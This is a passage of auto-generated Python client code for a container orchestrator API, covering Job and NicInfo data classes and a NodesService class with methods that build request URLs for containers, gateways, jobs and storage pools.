raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
property_name = 'type'
val = data.get(property_name)
if val is not None:
datatypes = [EnumContainerNICType]
try:
self.type = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: orchestrator/client/Job.py
```python
from . import client_support
class Job(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(id, logLevels, maxRestart, maxTime, queue, recurringPeriod, statsInterval, tags):
"""
:type id: str
:type logLevels: list[int]
:type maxRestart: int
:type maxTime: int
:type queue: str
:type recurringPeriod: int
:type statsInterval: int
:type tags: str
:rtype: Job
"""
return Job(
id=id,
logLevels=logLevels,
maxRestart=maxRestart,
maxTime=maxTime,
queue=queue,
recurringPeriod=recurringPeriod,
statsInterval=statsInterval,
tags=tags,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'Job'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'id'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.id = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'logLevels'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.logLevels = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'maxRestart'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.maxRestart = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'maxTime'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.maxTime = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'queue'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.queue = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'recurringPeriod'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.recurringPeriod = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'statsInterval'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.statsInterval = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'tags'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.tags = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: orchestrator/client/NicInfo.py
```python
from . import client_support
class NicInfo(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(addrs, flags, hardwareaddr, mtu, name):
"""
:type addrs: list[str]
:type flags: list[str]
:type hardwareaddr: str
:type mtu: int
:type name: str
:rtype: NicInfo
"""
return NicInfo(
addrs=addrs,
flags=flags,
hardwareaddr=hardwareaddr,
mtu=mtu,
name=name,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'NicInfo'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'addrs'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.addrs = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'flags'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.flags = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'hardwareaddr'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.hardwareaddr = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'mtu'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.mtu = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'name'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.name = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: orchestrator/client/nodes_service.py
```python
class NodesService:
def __init__(self, client):
self.client = client
def DeleteBridge(self, bridgeid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Remove bridge
It is method for DELETE /nodes/{nodeid}/bridges/{bridgeid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/bridges/"+bridgeid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetBridge(self, bridgeid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get bridge details
It is method for GET /nodes/{nodeid}/bridges/{bridgeid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/bridges/"+bridgeid
return self.client.get(uri, None, headers, query_params, content_type)
def ListBridges(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List bridges
It is method for GET /nodes/{nodeid}/bridges
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/bridges"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateBridge(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Creates a new bridge
It is method for POST /nodes/{nodeid}/bridges
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/bridges"
return self.client.post(uri, data, headers, query_params, content_type)
def GetContainerCPUInfo(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of all CPUs in the container
It is method for GET /nodes/{nodeid}/containers/{containername}/cpus
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/cpus"
return self.client.get(uri, None, headers, query_params, content_type)
def FileDelete(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete file from container
It is method for DELETE /nodes/{nodeid}/containers/{containername}/filesystem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/filesystem"
return self.client.delete(uri, data, headers, query_params, content_type)
def FileDownload(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Download file from container
It is method for GET /nodes/{nodeid}/containers/{containername}/filesystem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/filesystem"
return self.client.get(uri, None, headers, query_params, content_type)
def FileUpload(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Upload file to container
It is method for POST /nodes/{nodeid}/containers/{containername}/filesystem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/filesystem"
return self.client.post(uri, data, headers, query_params, content_type)
def GetContainerOSInfo(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of the container OS
It is method for GET /nodes/{nodeid}/containers/{containername}/info
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/info"
return self.client.get(uri, None, headers, query_params, content_type)
def KillContainerJob(self, jobid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kills the job
It is method for DELETE /nodes/{nodeid}/containers/{containername}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs/"+jobid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetContainerJob(self, jobid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get details of a submitted job on the container
It is method for GET /nodes/{nodeid}/containers/{containername}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs/"+jobid
return self.client.get(uri, None, headers, query_params, content_type)
def SendSignalToJob(self, data, jobid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Send signal to the job
It is method for POST /nodes/{nodeid}/containers/{containername}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs/"+jobid
return self.client.post(uri, data, headers, query_params, content_type)
def KillAllContainerJobs(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kill all running jobs on the container
It is method for DELETE /nodes/{nodeid}/containers/{containername}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs"
return self.client.delete(uri, None, headers, query_params, content_type)
def ListContainerJobs(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running jobs on the container
It is method for GET /nodes/{nodeid}/containers/{containername}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs"
return self.client.get(uri, None, headers, query_params, content_type)
def StartContainerJob(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Start a new job in this container
It is method for POST /nodes/{nodeid}/containers/{containername}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs"
return self.client.post(uri, data, headers, query_params, content_type)
def GetContainerMemInfo(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information about the memory in the container
It is method for GET /nodes/{nodeid}/containers/{containername}/mem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/mem"
return self.client.get(uri, None, headers, query_params, content_type)
def GetContainerNicInfo(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information about the network interfaces in the container
It is method for GET /nodes/{nodeid}/containers/{containername}/nics
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/nics"
return self.client.get(uri, None, headers, query_params, content_type)
def PingContainer(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Ping this container
It is method for POST /nodes/{nodeid}/containers/{containername}/ping
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/ping"
return self.client.post(uri, data, headers, query_params, content_type)
def KillContainerProcess(self, processid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kills the process by sending sigterm signal to the process. If it is still running, a sigkill signal will be sent to the process
It is method for DELETE /nodes/{nodeid}/containers/{containername}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/processes/"+processid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetContainerProcess(self, processid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get process details
It is method for GET /nodes/{nodeid}/containers/{containername}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/processes/"+processid
return self.client.get(uri, None, headers, query_params, content_type)
def SendSignalToProcess(self, data, processid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Send signal to the process
It is method for POST /nodes/{nodeid}/containers/{containername}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/processes/"+processid
return self.client.post(uri, data, headers, query_params, content_type)
def ListContainerProcesses(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get running processes in this container
It is method for GET /nodes/{nodeid}/containers/{containername}/processes
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/processes"
return self.client.get(uri, None, headers, query_params, content_type)
def StartContainer(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Start container instance
It is method for POST /nodes/{nodeid}/containers/{containername}/start
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/start"
return self.client.post(uri, data, headers, query_params, content_type)
def GetContainerState(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get aggregated consumption of container + all processes (CPU, memory, etc.)
It is method for GET /nodes/{nodeid}/containers/{containername}/state
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/state"
return self.client.get(uri, None, headers, query_params, content_type)
def StopContainer(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Stop container instance
It is method for POST /nodes/{nodeid}/containers/{containername}/stop
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/stop"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteContainer(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete container instance
It is method for DELETE /nodes/{nodeid}/containers/{containername}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername
return self.client.delete(uri, None, headers, query_params, content_type)
def GetContainer(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get container
It is method for GET /nodes/{nodeid}/containers/{containername}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername
return self.client.get(uri, None, headers, query_params, content_type)
def UpdateContainer(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Updates the container Nic
It is method for PUT /nodes/{nodeid}/containers/{containername}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername
return self.client.put(uri, data, headers, query_params, content_type)
def ListContainers(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running containers
It is method for GET /nodes/{nodeid}/containers
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateContainer(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new container
It is method for POST /nodes/{nodeid}/containers
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers"
return self.client.post(uri, data, headers, query_params, content_type)
def GetCPUInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of all CPUs in the node
It is method for GET /nodes/{nodeid}/cpus
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/cpus"
return self.client.get(uri, None, headers, query_params, content_type)
def GetDiskInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of all the disks in the node
It is method for GET /nodes/{nodeid}/disks
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/disks"
return self.client.get(uri, None, headers, query_params, content_type)
def GetGWFWConfig(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get current FW config
It is method for GET /nodes/{nodeid}/gws/{gwname}/advanced/firewall
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/advanced/firewall"
return self.client.get(uri, None, headers, query_params, content_type)
def SetGWFWConfig(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Set FW config
Once used you can not use gw.portforwards any longer
It is method for POST /nodes/{nodeid}/gws/{gwname}/advanced/firewall
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/advanced/firewall"
return self.client.post(uri, data, headers, query_params, content_type)
def GetGWHTTPConfig(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get current HTTP config
It is method for GET /nodes/{nodeid}/gws/{gwname}/advanced/http
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/advanced/http"
return self.client.get(uri, None, headers, query_params, content_type)
def SetGWHTTPConfig(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Set HTTP config
Once used you can not use gw.httpproxxies any longer
It is method for POST /nodes/{nodeid}/gws/{gwname}/advanced/http
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/advanced/http"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteDHCPHost(self, macaddress, interface, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete dhcp host
It is method for DELETE /nodes/{nodeid}/gws/{gwname}/dhcp/{interface}/hosts/{macaddress}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/dhcp/"+interface+"/hosts/"+macaddress
return self.client.delete(uri, None, headers, query_params, content_type)
def ListGWDHCPHosts(self, interface, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List DHCPHosts for specified interface
It is method for GET /nodes/{nodeid}/gws/{gwname}/dhcp/{interface}/hosts
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/dhcp/"+interface+"/hosts"
return self.client.get(uri, None, headers, query_params, content_type)
def AddGWDHCPHost(self, data, interface, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Add a dhcp host to a specified interface
It is method for POST /nodes/{nodeid}/gws/{gwname}/dhcp/{interface}/hosts
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/dhcp/"+interface+"/hosts"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteGWForward(self, forwardid, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete portforward, forwardid = srcip:srcport
It is method for DELETE /nodes/{nodeid}/gws/{gwname}/firewall/forwards/{forwardid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/firewall/forwards/"+forwardid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetGWForwards(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get list for IPv4 Forwards
It is method for GET /nodes/{nodeid}/gws/{gwname}/firewall/forwards
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/firewall/forwards"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateGWForwards(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new Portforwarding
It is method for POST /nodes/{nodeid}/gws/{gwname}/firewall/forwards
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/firewall/forwards"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteHTTPProxies(self, proxyid, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete HTTP proxy
It is method for DELETE /nodes/{nodeid}/gws/{gwname}/httpproxies/{proxyid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/httpproxies/"+proxyid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetHTTPProxy(self, proxyid, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get info of HTTP proxy
It is method for GET /nodes/{nodeid}/gws/{gwname}/httpproxies/{proxyid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/httpproxies/"+proxyid
return self.client.get(uri, None, headers, query_params, content_type)
def ListHTTPProxies(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List for HTTP proxies
It is method for GET /nodes/{nodeid}/gws/{gwname}/httpproxies
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/httpproxies"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateHTTPProxies(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create new HTTP proxies
It is method for POST /nodes/{nodeid}/gws/{gwname}/httpproxies
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/httpproxies"
return self.client.post(uri, data, headers, query_params, content_type)
def MigrateGateway(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Migrate Gateway
It is method for POST /nodes/{nodeid}/gws/{gwname}/migrate
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/migrate"
return self.client.post(uri, data, headers, query_params, content_type)
def StartGateway(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Start Gateway instance
It is method for POST /nodes/{nodeid}/gws/{gwname}/start
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/start"
return self.client.post(uri, data, headers, query_params, content_type)
def StopGateway(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Stop gateway instance
It is method for POST /nodes/{nodeid}/gws/{gwname}/stop
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/stop"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteGateway(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete gateway instance
It is method for DELETE /nodes/{nodeid}/gws/{gwname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetGateway(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get gateway
It is method for GET /nodes/{nodeid}/gws/{gwname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname
return self.client.get(uri, None, headers, query_params, content_type)
def UpdateGateway(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Update Gateway
It is method for PUT /nodes/{nodeid}/gws/{gwname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname
return self.client.put(uri, data, headers, query_params, content_type)
def ListGateways(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running gateways
It is method for GET /nodes/{nodeid}/gws
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateGW(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new gateway
It is method for POST /nodes/{nodeid}/gws
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws"
return self.client.post(uri, data, headers, query_params, content_type)
def GetNodeOSInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of the OS of the node
It is method for GET /nodes/{nodeid}/info
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/info"
return self.client.get(uri, None, headers, query_params, content_type)
def KillNodeJob(self, jobid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kills the job
It is method for DELETE /nodes/{nodeid}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/jobs/"+jobid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetNodeJob(self, jobid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get the details of a submitted job
It is method for GET /nodes/{nodeid}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/jobs/"+jobid
return self.client.get(uri, None, headers, query_params, content_type)
def KillAllNodeJobs(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kill all running jobs
It is method for DELETE /nodes/{nodeid}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/jobs"
return self.client.delete(uri, None, headers, query_params, content_type)
def ListNodeJobs(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running jobs
It is method for GET /nodes/{nodeid}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/jobs"
return self.client.get(uri, None, headers, query_params, content_type)
def GetMemInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information about the memory in the node
It is method for GET /nodes/{nodeid}/mem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/mem"
return self.client.get(uri, None, headers, query_params, content_type)
def GetNodeMounts(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of all the mountpoints on the node
It is method for GET /nodes/{nodeid}/mounts
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/mounts"
return self.client.get(uri, None, headers, query_params, content_type)
def GetNicInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information about the network interfaces in the node
It is method for GET /nodes/{nodeid}/nics
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/nics"
return self.client.get(uri, None, headers, query_params, content_type)
def PingNode(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Ping this node
It is method for POST /nodes/{nodeid}/ping
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/ping"
return self.client.post(uri, data, headers, query_params, content_type)
def KillNodeProcess(self, processid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kills the process by sending sigterm signal to the process. If it is still running, a sigkill signal will be sent to the process
It is method for DELETE /nodes/{nodeid}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/processes/"+processid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetNodeProcess(self, processid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get process details
It is method for GET /nodes/{nodeid}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/processes/"+processid
return self.client.get(uri, None, headers, query_params, content_type)
def ListNodeProcesses(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get processes
It is method for GET /nodes/{nodeid}/processes
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/processes"
return self.client.get(uri, None, headers, query_params, content_type)
def RebootNode(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Immediately reboot the machine
It is method for POST /nodes/{nodeid}/reboot
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/reboot"
return self.client.post(uri, data, headers, query_params, content_type)
def GetNodeState(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
The aggregated consumption of node + all processes (cpu, memory, etc...)
It is method for GET /nodes/{nodeid}/state
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/state"
return self.client.get(uri, None, headers, query_params, content_type)
def GetStats(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get all statskeys of the node
It is method for GET /nodes/{nodeid}/stats
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/stats"
return self.client.get(uri, None, headers, query_params, content_type)
def DeleteStoragePoolDevice(self, deviceuuid, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Removes the device from the storage pool
It is method for DELETE /nodes/{nodeid}/storagepools/{storagepoolname}/devices/{deviceuuid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/devices/"+deviceuuid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetStoragePoolDeviceInfo(self, deviceuuid, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get information of the device
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/devices/{deviceuuid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/devices/"+deviceuuid
return self.client.get(uri, None, headers, query_params, content_type)
def ListStoragePoolDevices(self, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List the devices in the storage pool
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/devices
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/devices"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateStoragePoolDevices(self, data, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Add extra devices to this storage pool
It is method for POST /nodes/{nodeid}/storagepools/{storagepoolname}/devices
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/devices"
return self.client.post(uri, data, headers, query_params, content_type)
def RollbackFilesystemSnapshot(self, data, snapshotname, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Rollback the file system to the state at the moment the snapshot was taken
It is method for POST /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots/{snapshotname}/rollback
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots/"+snapshotname+"/rollback"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteFilesystemSnapshot(self, snapshotname, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete snapshot
It is method for DELETE /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots/{snapshotname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots/"+snapshotname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetFilesystemSnapshotInfo(self, snapshotname, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information on the snapshot
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots/{snapshotname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots/"+snapshotname
return self.client.get(uri, None, headers, query_params, content_type)
def ListFilesystemSnapshots(self, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List snapshots of this file system
